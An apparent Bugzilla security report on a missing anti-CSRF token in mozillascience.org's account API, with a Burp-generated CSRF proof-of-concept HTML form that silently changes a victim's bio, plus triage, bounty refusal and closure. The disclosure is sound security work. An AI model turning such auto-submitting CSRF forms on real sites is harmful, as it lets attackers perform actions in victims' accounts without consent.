Closed Bug 1264952 Opened 9 years ago Closed 3 years ago

Categories

(Mozilla Foundation Communications :: Website, task)

task
Not set
normal

Tracking

(Not tracked)

RESOLVED WORKSFORME

People

(Reporter: p4r3sh.p4rm4r, Unassigned)

Details

(Keywords: reporter-external, sec-low, wsec-csrf)

Attachments

(1 file)

User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 Steps to reproduce: While creating a account, capture request on burp suite. which is look like this . POST /api/users/create HTTP/1.1 Host: www.mozillascience.org bio=test After that ive created CSRF form <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://www.mozillascience.org/api/users/create" method="POST"> <input type="hidden" name="bio" value="test" /> <input type="submit" value="Submit request" /> </form> </body> </html> save this form as HTML and send it to victim. when victim opens it. his/her bio will be change to test. Actual results: ANTI CSRF token is missing on this form.
Not sure to whom this should go, so... starting by moving off Marketplace to a (hopefully) more monitored product. NI someone who should know better than I.
Group: client-services-security → mozilla-employee-confidential
Component: General → Metrics
Flags: needinfo?(abigail)
Product: Marketplace → Mozilla Foundation
anyone looking into this ?
Simon: this looks like foundation stuff, would you be able to help us find the right person/project to direct this to for development triage?
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(simon)
Abby is the best person to do this work. Abby, could you please work with cade and Hannah to get this fixed? Jonathan, I'm off on PTO for a week and a bit. Feel free to flag :cade for security issues in my absence. Thanks, Simon
Flags: needinfo?(simon)
Thank you for your report.
Keywords: sec-low, wsec-csrf
looks fixed!
Flags: sec-bounty?
Paresh: Thanks for your report. This is not an eligible bounty property. If you're looking for bounties, you should check out the eligible sets on the websec bounty page (https://www.mozilla.org/en-US/security/bug-bounty/faq-webapp/#eligible-bugs). We're planning on adding a bunch of new site to the list soon, but this web property is not slated for addition. Thank you again!
Flags: sec-bounty? → sec-bounty-
Reporter asked in email to reconsider the bounty decision.
Flags: sec-bounty- → sec-bounty?
I will point out that this is a sec-low rated issue. If that rating is correct, it wouldn't be eligible for a bounty even if it was on a site on the list in comment 8.
Flags: sec-bounty? → sec-bounty-
This is minused for bounty as a sec-low that isn't on the eligible sites list (both of which would make it ineligible for a bounty).
Flags: needinfo?(abigail)
Attached file CSRF.HTML

mozillascience.org has been gone for a while, it appears.

Group: mozilla-employee-confidential
Status: NEW → RESOLVED
Closed: 3 years ago
Component: Metrics → Website
Product: Mozilla Foundation → Mozilla Foundation Communications
Resolution: --- → WORKSFORME
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: